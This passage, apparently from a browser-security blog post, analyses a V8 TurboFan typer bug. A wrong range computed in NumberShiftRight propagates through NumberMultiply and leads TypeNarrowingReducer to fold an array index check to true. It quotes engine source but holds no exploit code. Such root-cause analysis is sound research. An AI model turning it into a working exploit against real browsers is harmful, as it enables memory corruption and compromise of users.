2. Actual: idx <span style="color:#f92672">=</span> 1073741824; idx &gt;&gt; 30 <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span> 
    this is equivalent to <span style="color:#ae81ff">1073741824</span> / 1073741824 <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>
</code></pre></div><p>Eventuall, in <code>NumberShiftRight</code> the range is calculated as <code>Range(0,0)</code> in the NumberShiftRight. However the actual range should be <code>Range(0,1)</code>. Then it is passed into the <code>SpeculativeNumberMultiply</code> node as <code>input node 0</code> in <code>Typerphase</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++">Type OperationTyper<span style="color:#f92672">::</span>NumberShiftRight(Type lhs, Type rhs) {
  DCHECK(lhs.Is(Type<span style="color:#f92672">::</span>Number()));
  DCHECK(rhs.Is(Type<span style="color:#f92672">::</span>Number()));

  lhs <span style="color:#f92672">=</span> NumberToInt32(lhs);
  rhs <span style="color:#f92672">=</span> NumberToUint32(rhs);

  <span style="color:#66d9ef">if</span> (lhs.IsNone() <span style="color:#f92672">||</span> rhs.IsNone()) <span style="color:#66d9ef">return</span> Type<span style="color:#f92672">::</span>None();

  <span style="color:#66d9ef">int32_t</span> min_lhs <span style="color:#f92672">=</span> lhs.Min();
  <span style="color:#66d9ef">int32_t</span> max_lhs <span style="color:#f92672">=</span> lhs.Max();
  <span style="color:#66d9ef">uint32_t</span> min_rhs <span style="color:#f92672">=</span> rhs.Min();
  <span style="color:#66d9ef">uint32_t</span> max_rhs <span style="color:#f92672">=</span> rhs.Max();
  <span style="color:#66d9ef">if</span> (max_rhs <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">31</span>) {
    <span style="color:#75715e">// rhs can be larger than the bitmask
</span><span style="color:#75715e"></span>    max_rhs <span style="color:#f92672">=</span> <span style="color:#ae81ff">31</span>;
    min_rhs <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
  }
  <span style="color:#66d9ef">double</span> min <span style="color:#f92672">=</span> std<span style="color:#f92672">::</span>min(min_lhs <span style="color:#f92672">&gt;&gt;</span> min_rhs, min_lhs <span style="color:#f92672">&gt;&gt;</span> max_rhs);
  <span style="color:#66d9ef">double</span> max <span style="color:#f92672">=</span> std<span style="color:#f92672">::</span>max(max_lhs <span style="color:#f92672">&gt;&gt;</span> min_rhs, max_lhs <span style="color:#f92672">&gt;&gt;</span> max_rhs);

  <span style="color:#66d9ef">if</span> (max <span style="color:#f92672">==</span> kMaxInt <span style="color:#f92672">&amp;&amp;</span> min <span style="color:#f92672">==</span> kMinInt) <span style="color:#66d9ef">return</span> Type<span style="color:#f92672">::</span>Signed32();
  <span style="color:#66d9ef">return</span> Type<span style="color:#f92672">::</span>Range(min, max, zone());
}
</code></pre></div><p>The <code>SpeculativeNumberMultiply</code> is also reduced into <code>NumberMultiply</code> during the typed optimization. In <code>NumberMultiply</code> function:</p>
<ol>
<li>lhs = Range(0,0) // Output of NumberShiftRight, in actual the range is Range(0,1)</li>
<li>rhs = Range(4,4) // NumberConstant 4</li>
</ol>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++">Type OperationTyper<span style="color:#f92672">::</span>NumberMultiply(Type lhs, Type rhs) {
  <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>  <span style="color:#75715e">// Compute the effective type, utilizing range information if possible.
</span><span style="color:#75715e"></span>  Type type <span style="color:#f92672">=</span> (lhs.Is(cache_<span style="color:#f92672">-&gt;</span>kInteger) <span style="color:#f92672">&amp;&amp;</span> rhs.Is(cache_<span style="color:#f92672">-&gt;</span>kInteger))
                  <span style="color:#f92672">?</span> MultiplyRanger(lhs.Min(), lhs.Max(), rhs.Min(), rhs.Max())
                  <span style="color:#f92672">:</span> Type<span style="color:#f92672">::</span>OrderedNumber();

  <span style="color:#75715e">// Take into account the -0 and NaN information computed earlier.
</span><span style="color:#75715e"></span>  <span style="color:#66d9ef">if</span> (maybe_minuszero) type <span style="color:#f92672">=</span> Type<span style="color:#f92672">::</span>Union(type, Type<span style="color:#f92672">::</span>MinusZero(), zone());
  <span style="color:#66d9ef">if</span> (maybe_nan) type <span style="color:#f92672">=</span> Type<span style="color:#f92672">::</span>Union(type, Type<span style="color:#f92672">::</span>NaN(), zone());
  <span style="color:#66d9ef">return</span> type;
}
</code></pre></div><p>In our case both <code>lhs</code> and <code>rhs</code> are type <code>kInteger</code> then it calls <code>MultiplyRanger</code> function which returns the range <code>Range(0,0)</code> but in actual the range should be <code>Range(0,4)</code>.</p>
<p>Now, In <code>LoadElimination</code> phase <code>TypeNarrowingReducer::Reduce</code> is called, where the it is switched to case <code>IrOpcode::kNumberLessThan</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++">Reduction TypeNarrowingReducer<span style="color:#f92672">::</span>Reduce(Node<span style="color:#f92672">*</span> node) {
  <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>  <span style="color:#66d9ef">switch</span> (node<span style="color:#f92672">-&gt;</span>opcode()) {
    <span style="color:#66d9ef">case</span> IrOpcode<span style="color:#f92672">::</span>kNumberLessThan: {
      <span style="color:#75715e">// TODO(turbofan) Reuse the logic from typer.cc (by integrating relational
</span><span style="color:#75715e"></span>      <span style="color:#75715e">// comparisons with the operation typer).
</span><span style="color:#75715e"></span>      Type left_type <span style="color:#f92672">=</span> NodeProperties<span style="color:#f92672">::</span>GetType(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">0</span>));
      Type right_type <span style="color:#f92672">=</span> NodeProperties<span style="color:#f92672">::</span>GetType(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">1</span>));
      <span style="color:#66d9ef">if</span> (left_type.Is(Type<span style="color:#f92672">::</span>PlainNumber()) <span style="color:#f92672">&amp;&amp;</span>
          right_type.Is(Type<span style="color:#f92672">::</span>PlainNumber())) {
        <span style="color:#66d9ef">if</span> (left_type.Max() <span style="color:#f92672">&lt;</span> right_type.Min()) {
          new_type <span style="color:#f92672">=</span> op_typer_.singleton_true();
        } <span style="color:#66d9ef">else</span> <span style="color:#a6e22e">if</span> (left_type.Min() <span style="color:#f92672">&gt;=</span> right_type.Max()) {
          new_type <span style="color:#f92672">=</span> op_typer_.singleton_false();
        }
      }
      <span style="color:#66d9ef">break</span>;
    }
</code></pre></div><p>In our case,</p>
<ol>
<li>left_type.Max() = 0</li>
<li>right_type.Max() = 2</li>
</ol>
<p>This time the <code>new_type</code> is set to <code>singleton_true()</code> because the condition <code>left_type.Max() &lt; right_type.Min()</code> is true which means <code>index  is less than the length of array</code>.</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
